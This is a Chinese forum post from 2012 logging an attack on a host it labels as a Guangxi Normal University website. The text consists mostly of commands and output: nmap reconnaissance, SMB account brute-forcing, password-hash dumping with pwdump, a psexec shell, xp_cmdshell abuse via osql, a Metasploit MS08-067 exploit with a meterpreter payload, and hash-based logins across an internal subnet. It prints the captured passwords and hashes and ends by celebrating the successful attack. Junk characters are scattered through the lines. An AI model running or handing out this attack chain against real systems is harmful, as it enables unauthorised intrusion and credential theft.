广西师范网站http://202.103.242.241/
1 { G9 b3 } x& U+ b4 I4 z1 X" B
root@bt:~# nmap -sS -sV 202.103.242.241
7 i! h1 m0 A7 @1 M( Y- B
" c+ h0 B G! C9 O+ b8 b6 x$ }( H! DStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST6 {( j: c# ~8 j
5 Z) W/ x( i+ |/ I: PNmap scan report for bogon (202.103.242.241)
2 }7 ?% v% C9 m6 Y+ c4 f. n2 p
, J% f. c6 `- r8 z/ C# uHost is up (0.00048s latency).
7 p7 [; H/ H( J' k6 A# j7 v6 s$ w" @" Y: h
Not shown: 993 closed ports
$ A1 |8 y- C' X4 t' t* A; C& i4 |& c6 Q1 @, e7 D2 Z
PORT STATE SERVICE VERSION/ z4 R8 n! y% j |( D, y& k, C
/ F. F- p' P, E% `6 e
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
' X/ U% B, ~3 \0 Z; h! F) ^9 ^6 b5 h3 X; p0 O
139/tcp open netbios-ssn$ W5 x1 ?# q7 Z: M; M7 g5 U! [, p
% a0 G; v* _% T+ }3 q
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds6 q" M; a7 S) ~
* q0 N/ r2 I! ^, q! E
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)5 L3 O( |/ D) q# F; R- l
( J( f7 V6 r5 m. r
1026/tcp open msrpc Microsoft Windows RPC$ N7 T1 I; w) _2 h7 D) M
, N3 m: q# W+ O8 y/ F3 [0 ?
3372/tcp open msdtc?
. d3 F9 U3 `7 S0 g, P. k6 M& L! G7 z/ K! ~5 y/ M4 `. I; p
3389/tcp open ms-term-serv?
5 t7 z' c$ l7 U1 L6 k6 H$ l( x% O9 ]
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
3 e: Q7 X: m4 wSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r5 b8 _+ q: I" v
# n, i0 H# A8 [- Y/ U% PSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions; O6 w' R: |" s" q7 t- L( Y3 \& ]
l! `6 z$ d" d" p! L+ H+ H% |2 ySF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)+ r7 M( n( ~; q: z# N. i
) |, ]) z% e! @2 O- USF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO. ~/ @# \! u; @7 T& s/ Y, `
1 T, k$ I5 k% e( F
SF:ptions,6,”hO\n\x000Z”);/ K5 _1 T- J1 l
7 u4 ~; ^5 U V- G T( R1 F( B$ lMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)! B# i1 V" U) h
0 L r! b' X0 t: G! g6 Y# [+ H
Service Info: OS: Windows; V' N8 d- G" M; D' {% ~3 a3 z
' M6 a* Y: \& W1 ]+ E6 u bService detection performed. Please report any incorrect results at http://nmap.org/submit/ .- W/ X! \% G- a
' ~+ ]& m# t/ ~, p$ M
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds% D( R: M3 H: n& k% h0 Q- V- n
r. [) e8 K( Z) X+ @( T: A# [! q' l
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本: d, D5 h4 F. \
0 M, \! K6 P; t4 L" ~-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse8 l. C! U& f' H. A. R/ t2 [
5 Q- B4 h5 `6 Z# c1 |' M: r" L-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse+ ^" N% E m2 K8 W5 I$ ^- C) }4 G
1 d& n) c& W. p. X' w2 r-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
* {1 h R% q4 M6 r: E
" q( u0 r( Q" ^3 H5 f, q-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse' h6 @' ]" H4 q" w P9 p5 v1 Q
8 E) f6 s' s% C1 z8 \-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
- b s$ x. u' P: p# \( I! u q' }
! g2 S3 Y; T a5 [! C6 |-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
6 a* d' c: w- d( J. N7 J% v6 e) {
, p4 I& t( h- V: m9 A3 G-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
' f9 D0 E4 l. E2 F* y4 K) M
! Q9 @/ w( ]( V( \) F-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse" B- W8 N# {9 Y' l
+ T) `+ o5 v/ C" F. j
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
9 U: U8 G; N @$ T" E+ Y) b8 O' X$ n
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
- X; m+ `. ? J$ s1 g" F! e5 Z3 W& S# @3 B+ h
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse5 K0 Y4 ]* B# C: M5 h
I' \/ U- R$ o( q4 s2 K. Z0 t& F& F
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse; B; l6 o) |9 q; S2 B. i
+ a! m, j8 d' {* v5 B2 f1 l
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
2 L% ~! |& @, o3 \3 k/ Q$ g8 U1 b4 I; H' I) a: `1 `0 [ I2 \/ k2 I& R
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
+ L5 h1 a( B. b6 E1 T. N& W ?7 M# @7 D4 }7 o; A: k3 P; t: [: e0 M
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse& u e+ C" e: p6 ~, O
4 G4 g* }( l G$ ?3 \
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
$ v( t& ~* B$ t2 \2 _$ \
# u6 Y% Y/ o2 I# {+ c) f8 G//此乃使用脚本扫描远程机器所存在的账户名' z: T4 V2 K& l7 H( O A5 V
+ h3 ]( ^* D" {! X$ b) V% {Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST" b, ]- B# D- r2 H8 c
' z$ u# W$ p1 QNmap scan report for bogon (202.103.242.241)
) e2 q' o$ \) T- S+ E% t5 y; M. `9 y. N
Host is up (0.00038s latency).4 O, q. C" V" c" S# B& ^5 M
0 n3 S8 q& s! i& g2 K$ N) GNot shown: 993 closed ports. i( t" ]! K+ W) a9 C( A+ _& L
: Q* o' h3 a# I8 `
PORT STATE SERVICE" w/ s2 M8 v2 w* t
0 t, @( V! a P2 p135/tcp open msrpc2 I" M; f$ ~# N4 x# B
9 @/ a6 i# W( Y" W& _0 p- p9 x7 _
139/tcp open netbios-ssn
' S! z: [) l% ?% ^
( ~$ |+ M9 ?& ?! P445/tcp open microsoft-ds' U$ [. Z- x* t/ K8 T+ B8 ~
, S# y% }8 n: k0 C1025/tcp open NFS-or-IIS
0 q* `6 Q; r5 J9 X
J$ T. H4 h3 R( `: _# ~# Q& ~1026/tcp open LSA-or-nterm6 A& j! T. c5 M* b; u. K
* d/ S. h' u8 C& S$ k
3372/tcp open msdtc
3 j8 I" e' o7 M1 t" g6 f
; h9 B% e) A5 ?, Y' Y3389/tcp open ms-term-serv! j8 i, P6 d6 N+ B3 E8 j
& l' e' J) ?) A. h7 M5 s; a1 lMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
+ M; i% q1 ?# ^: h7 D- J9 @ ]5 {2 u$ |. s3 m/ c
Host script results:% ~! Y* l" k; i
& _4 H# C6 U% Y! v# n+ M8 I| smb-enum-users:
6 _9 L! G+ m) D! R D! V5 y- r, I0 l
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果1 S0 h5 t2 l% D1 M0 x
7 E) r- g' T# P6 d. J# MNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
! [$ k4 c5 s+ k: o% v* ]8 d0 N+ x# p% J
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
# Z# B3 [1 D3 N4 \! ?$ D+ D$ ?: W) C w5 m; r" d2 c* n
//查看共享
~& Y) ?; K: J( J/ t- V* x/ y1 n! Q" ^. ?
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
" N" Y6 O4 Y. E# X- x7 V
- a( c' h+ S" b5 a* k9 e3 cNmap scan report for bogon (202.103.242.241)
9 G6 J* x6 I! T
. @8 B: V2 S. ?) q5 o1 RHost is up (0.00035s latency).
% P K t5 W3 |# y R% j1 p1 B1 v' R+ F3 z& h( V
Not shown: 993 closed ports* Z8 Z+ K6 Z0 s! p0 y
" u) i: K( Y$ L# n- }# G, p# k( L
PORT STATE SERVICE# e: u7 c1 q# i' ]7 O: k% H; c
, r) K5 \! [3 q5 p& s3 h6 {135/tcp open msrpc
: A9 ^% {: y, m7 @% Z6 C- [4 O( b" M% v# s
139/tcp open netbios-ssn) Y1 p* e9 x- S1 ]% t& H0 M
9 w' p, L* \7 K, n445/tcp open microsoft-ds: J9 U8 D7 a/ t! b9 A L
& P& E3 _' L& ?" O
1025/tcp open NFS-or-IIS$ Z" T* _" V: L6 N
, \- } g4 N z! T- ~
1026/tcp open LSA-or-nterm
# t+ X# F: i) V; z/ ], \: w# f9 a* K/ h& u! C! S0 x
3372/tcp open msdtc
2 {6 n N: ~. d1 }% n0 B5 c3 P4 J+ `/ g& I4 C" v9 e" D0 _
3389/tcp open ms-term-serv
6 S1 [+ ~ H; U$ ^( ~, q* e3 ]3 |' U) x+ c* O
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)6 F7 H- o1 ]: q' {
, ]* _( ?- f/ m3 O7 ]/ w7 S3 U9 O, QHost script results:
! W& }' z" M$ _0 q6 d/ R
' x' t5 t& `& J3 w# p( p! w$ w| smb-enum-shares:
. Z0 l$ n* W+ h: x' r `) V. D; J. s _; o$ S0 P
| ADMIN$) x5 f& u( E- O* f( ], N
' f6 i5 ~; F3 { f. S; O| Anonymous access: <none>+ }! B9 W$ G, E: v% p$ H4 @
# b3 W) z8 Q6 C" M| C$
9 Y' M/ `- Q9 Y7 N5 [: H r- x) g' d" _1 W
| Anonymous access: <none>, E; s1 R- [' b7 f
! V! |) s0 a8 K9 l$ Z| IPC$
+ F9 l7 z( M6 l! O9 m1 r' F2 [4 y
|_ Anonymous access: READ
2 D! e9 g6 ~9 E8 h# P" ~4 Z! R R! P+ J+ }4 g# O
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
; n2 |+ p6 s- p) b' c; m6 t8 z0 s/ i# [/ A! q6 } p
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 o; _4 ]6 d7 v. y0 C2 e
; [7 w/ j. t. X+ g. Q
//获取用户密码0 V e& p8 l0 J
3 Z+ {4 a2 J) u9 [& b$ T) E" G2 DStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST, L3 O: A- M( {& _$ m
8 ]; ~8 [) Y7 S
Nmap scan report for bogon (202.103.242.2418)) G/ [* _' C" A9 ?0 p. f' b& \) m
2 S& o$ j( U1 `* R. i5 M
Host is up (0.00041s latency).% H( j/ }5 y4 q4 s" U
5 I2 D) n$ J3 S1 u+ ZNot shown: 993 closed ports
7 n# ]. \7 O" J4 h$ f2 P
# q( Y3 b% F; _PORT STATE SERVICE
6 b @+ k8 z+ {( T- d/ u7 L+ s, [
' e7 |. U! d- U e1 H6 q$ t135/tcp open msrpc3 i( u" o+ s, l: D
+ t: H; s% \1 ] e/ {% x9 h139/tcp open netbios-ssn: ]: L% j! z7 w; \+ a% m7 y4 j
6 }1 j9 p4 Q+ H7 M
445/tcp open microsoft-ds
1 N" p, d' E% y- L' W9 p
( H# Q$ j; U9 j) z$ C1025/tcp open NFS-or-IIS
# N- F* e+ l4 s) c
6 |- Y- Y- S& B% L! Y- H( @1026/tcp open LSA-or-nterm4 e+ `5 w2 _' d0 n) n: X; y6 t0 _
' e& Z( `0 h" x' V q0 v2 B1 c
3372/tcp open msdtc
7 H+ S8 [9 R3 Y5 }
3 w# x( s# k, G# m2 F* _5 ?3389/tcp open ms-term-serv
* w# z2 b! s) C0 [% \! _) D# V; v6 g! } |$ N# e' D
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems): w1 N. S/ K3 W" {$ r; g1 ]
% K% j; S0 u/ r. b
Host script results:
( V& p* i" j: D0 A3 X
3 v. Y2 ?3 s6 C; J3 J' u. O5 ^| smb-brute:& Q- g I& K) H+ R3 e/ e, X
6 _2 G8 z. Q1 M ], Y- W l5 s" W" e
administrator:<blank> => Login was successful1 X# J2 i- t$ w5 F3 f4 M
4 F& t V5 m0 w; Z" I
|_ test:123456 => Login was successful4 x# P! t- n+ C& u; o. W4 a
5 Y" j! o% o; C
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
5 a+ h! G3 `6 p5 }+ m+ F7 ]: `2 u) F/ Y' X0 b: _8 b0 U$ K
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
% E6 X: n4 ~! i/ |+ a
1 Q5 ^3 t! `4 P; }root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data! Y2 N1 v* o2 ]8 J3 K
# I" \& ]5 t" m0 xroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse( \4 z1 }5 h: ?4 p$ Z/ }
3 f1 @4 W: Q% Z, ^; ]+ b5 e( sroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
/ d2 F% p" o& M* C4 S, Z( Z
4 T: `; N2 g+ F" s( f4 vStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST2 Q0 H& Z! D) q# q) B
; U2 u3 Q0 I- a" S, t/ ` |/ GNmap scan report for bogon (202.103.242.241)/ F+ [1 n' h. \4 e3 y( A* b
3 I R2 I/ ]2 G- o# x( [( Z0 lHost is up (0.0012s latency).$ T( q( M3 j1 a' t# E
. p1 R( G% }, N3 ~8 I$ M/ o( W
PORT STATE SERVICE7 }- J& h$ H Z: @
2 w( e3 m% ~2 _8 g4 ^' q: O" B
135/tcp open msrpc' r! B) E X$ `3 |+ a/ ]
" n9 @& |! d1 v, N139/tcp open netbios-ssn
6 i! D/ v/ L9 O Z; J% C& c$ e
& o9 `( R6 C" a445/tcp open microsoft-ds* I1 t! r# B% H! y) J9 Q0 k/ y
" Z) _+ M& M2 `4 i& d% V& U+ z7 EMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)- w& y' q( S4 e: n% g
- T& W+ K, y0 H" _ z" K/ |Host script results:& E. F7 d; m: u, N0 k/ H
) S* w( n3 ~2 y9 w' _ Z9 W| smb-pwdump:
6 x) y; j7 l$ {$ A( h/ I3 `
1 `1 Q6 I! e% R, E* p+ J% ~; ?) a4 s| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************3 F- `& V" ]! `2 W% j% }/ H- Q
. @5 {, g' {5 I/ g1 l| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
1 r* F' Y$ d; z6 y1 @; `7 a9 a$ f
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
6 f9 Y( A s3 L7 Z
) L* U- L/ c! ^! L2 C: f0 D: f|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
1 h' p$ K7 g0 h# `5 I K2 k2 P6 m# y7 ]
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds- Q- f @ a% s; \2 [0 e
) o) L: {- ^6 O4 n
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
1 N* @" Y$ i7 T0 q) q4 _$ X2 ]8 e& I* _' [& ^) i5 j7 P) h& m1 g) D
-p 123456 -e cmd.exe
9 {- n3 i+ g8 y2 Y% Q$ M+ [. @" U8 O Y& ?* ^* R
PsExec v1.55 – Execute processes remotely' K9 Q; `- h8 f# K. N' ]% ]7 Q3 i! j
3 t0 J& m; X+ H) b, _! vCopyright (C) 2001-2004 Mark Russinovich4 _( U/ O$ i* B& r+ c" v% K- z2 X
+ x; O" o3 A0 ~1 i* q
Sysinternals – www.sysinternals.com
, R/ J7 L$ D8 S5 n( g6 @9 U) w' w0 D4 }1 }4 M2 e. v4 q- t
Microsoft Windows 2000 [Version 5.00.2195]
) {7 l; F' o4 C( u( Z/ w7 }
* Y) ~- N0 V; t% l(C) 版权所有 1985-2000 Microsoft Corp.
* }) H0 n# s0 D1 Q! e5 E4 h j; K) S' ?( {- T6 f
C:\WINNT\system32>ipconfig
, O6 l$ m* v; t6 w1 N" d/ J% [; `5 t
Windows 2000 IP Configuration1 n2 M. T: t S5 e
$ }6 p' d# V7 z4 s7 u" }5 _9 x( Q
Ethernet adapter 本地连接:
8 V8 X& I2 r& k5 i' C) }( \
8 a% A, `/ X3 FConnection-specific DNS Suffix . :2 s- R/ ]2 b4 T2 ^* o* C
0 Y$ `. z n) ]0 ?% ]; x4 y& ]. IIP Address. . . . . . . . . . . . : 202.103.242.241: F V0 P$ s( T* [
& {* j) _( A- d: F3 ~Subnet Mask . . . . . . . . . . . : 255.255.255.0
! M# I" h2 v3 A
# c2 M+ V+ r; n' B' IDefault Gateway . . . . . . . . . : 202.103.1.1, ?- ]* L6 _0 z6 i
& I* R) H1 R0 P) V2 K. j
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
; i$ M8 C4 L7 N
( F+ L: x0 U. @, g: E! Groot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
* G4 ]" P- F5 ]
8 e0 x# ?. ]# h% R: p7 HStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST: b7 G) P, a$ w; v
. D# h8 t" Z9 ]- W, m, E
Nmap scan report for bogon (202.103.242.241)
# [9 d7 Y2 ?# K
# o3 |# g5 N5 Z+ x! a5 `Host is up (0.00046s latency).+ F5 w- g, z0 u2 t7 `- j
! D5 Q0 Z% @, W3 H% a6 W0 |+ KNot shown: 993 closed ports: {1 m) Z5 o; U1 y Z* o# [9 Q# y5 q
6 ?" j: Z9 R5 \( ^3 l) H: mPORT STATE SERVICE; T C# x0 [0 f# f8 M; E
! s( R( _- k& u. U! J135/tcp open msrpc
* N6 @* l. ^- b" }1 r. j3 j
& l% j8 J2 R) q8 j M8 Q139/tcp open netbios-ssn
l8 u) p! l& W& i2 Z
! k) |' J; V* A) y445/tcp open microsoft-ds
% y/ L( O3 o1 X
7 ?% o( c! k9 V* B1 N1025/tcp open NFS-or-IIS
3 _' `6 a1 W2 q( u6 t
" o/ X$ o# Z: p# A0 A9 C1026/tcp open LSA-or-nterm
; r* A; y7 c, l& D# q. c4 V) N4 I2 D1 x
3372/tcp open msdtc
+ h L8 p5 ^! V" q. q( e- @% D }4 d6 e2 s( w5 O
3389/tcp open ms-term-serv
. ] z3 _; G( @+ X* R& N0 v; `% w8 M9 t _; ^
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
8 |* g1 V5 B3 G; E: n. Z7 Y. t& o3 a: _
Host script results:
5 n O7 L# f2 Y: S% z
( D+ |9 n. \8 t6 l: V1 J| smb-check-vulns:; j( s, ?( r) F) W
8 b0 f4 I- _9 P! y+ [0 O& x( R
|_ MS08-067: VULNERABLE
7 \. x* |% |. K1 k% x- q% R# Q) K; L3 m
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
) [2 q6 }5 y4 v) r: L/ B
" y" L7 x+ W' B6 z) ~$ z& x4 Broot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
- K& Y* f8 n/ Y; F2 [8 y" ?# u/ y6 b, z3 @
msf > search ms08
' j- B+ k+ l! R3 k- q0 i u
& l& P+ h1 u1 r/ F6 H8 M5 m4 Z: `/ r4 Y0 fmsf > use exploit/windows/smb/ms08_067_netapi
/ B6 F3 g/ j X& u2 q/ b+ }) [3 k0 V4 W: a# u) A- Q( |5 b
msf exploit(ms08_067_netapi) > show options
; Z. i& e% B4 ^* ^+ ^$ D
3 s x/ W5 o0 X- s( pmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.2419 H. w A. W7 [0 `
! b9 R/ w1 w% q) k$ a
msf exploit(ms08_067_netapi) > show payloads- E+ n( ]+ K/ }4 `* o
' Y, e+ f5 o' l& I( ~, t
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
6 r! s* x, F4 P8 e! u& e, P! N) _* P! A. d4 I6 ]# r& k
msf exploit(ms08_067_netapi) > exploit
b2 Q& B+ w' B$ J7 i# \8 P7 }2 c7 z! S$ r8 w
meterpreter >" r7 [" y5 @, O& n7 t) ?) c
+ n, g# h+ k) r# l9 h% d! aBackground session 2? [y/N] (ctrl+z)2 D: Y v- B( Z- j
; Y C: b2 u& D: g3 m, s
msf exploit(ms08_067_netapi) > sessions -l! ], ^! ]" H& i
8 K7 }3 t3 z: [3 b8 a* l. J6 ~
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt; `" m5 F3 S% F; [) t" K! o! J: f- F
1 y! y% X! j' i8 @6 D
test. k2 r B1 o$ s( P3 q* i% `, o
( L( `% c( |4 m3 U% f0 I9 x8 x2 Xadministrator2 C. t$ ^8 H5 N8 {7 d& G8 w- K0 P
8 G: O: a; n( k4 O, h
root@bt:/usr/local/share/nmap/scripts# vim password.txt; S$ {3 |+ X3 K: z$ m0 h" y
. F* Q9 A# f3 m8 C44EFCE164AB921CAAAD3B435B51404EE. t, d2 E `( I/ @0 s0 F
( A5 r" R) m2 J* H+ N! t; Qroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 7 {" w% H- o: S, q* t X, Y8 V
; u. O d% K7 n9 Q9 w' [* f5 L
//利用用户名跟获取的hash尝试对整段内网进行登录
2 x! G6 C: @- C$ _
`' d, G: Z" L. w3 I) w7 m' ^Nmap scan report for 192.168.1.105$ ~+ q! e0 S" @* r# j( k0 F+ l
+ K( V" E( z/ L; y6 DHost is up (0.00088s latency).0 y: j6 J- E' o; ~" S/ j
. @6 n* h$ P% n
Not shown: 993 closed ports+ k K5 v7 }4 F! O
! q# n- b& \+ A* v1 f! M0 A% g5 B8 S
PORT STATE SERVICE
/ D, x5 }$ m6 c5 K6 T9 J9 R5 l7 v* q1 M- q, u$ M2 }/ C& N& n* F
135/tcp open msrpc% x2 S) ^/ E9 s' x
6 K1 c6 s7 i5 b: s' s& Q, ^# w) n" j
139/tcp open netbios-ssn
6 P" K0 B- u5 p$ `4 ]9 ~1 B/ [' p- ^& X' s2 |- C$ P
445/tcp open microsoft-ds' X0 X- P. R; S* B: J0 h% e
/ t9 g" W2 d3 m# l7 ^( _' W1025/tcp open NFS-or-IIS k" Y3 A. ?. K/ j& S+ O
2 f( c+ I: J! l8 o3 F+ V! B
1026/tcp open LSA-or-nterm
2 t2 h: G7 q+ a& {4 Z4 M3 ~& d6 `! r4 \9 `- M% H& G
3372/tcp open msdtc' S6 U) A( o' ~% ^
+ G0 i' Y0 u" p
3389/tcp open ms-term-serv+ b: k* R. Z A# U, d8 T
! u+ i, R7 ~8 H V* h" S* V/ X$ oMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)7 Z" u+ ~. b& L' m0 Y( P: w7 y
9 P! x7 W+ g0 y8 A) x
Host script results:& w( w5 E$ T9 w& R) x! X# R' E0 G
$ o. K+ @( O _
| smb-brute:. a* u8 Q |1 F/ X8 O) j
. r% Q* h2 i3 R6 ~8 v4 ?|_ administrator:<blank> => Login was successful
6 ~" J3 t* k6 y: Z; A0 c$ }$ d: m
攻击成功,一个简单的msf+nmap攻击~~·) V! {& d4 q7 C; v( i) t: k
: B1 `/ F# G$ e9 f( H |
发表于 2012-12-4 12:46:42
收藏
支持
反对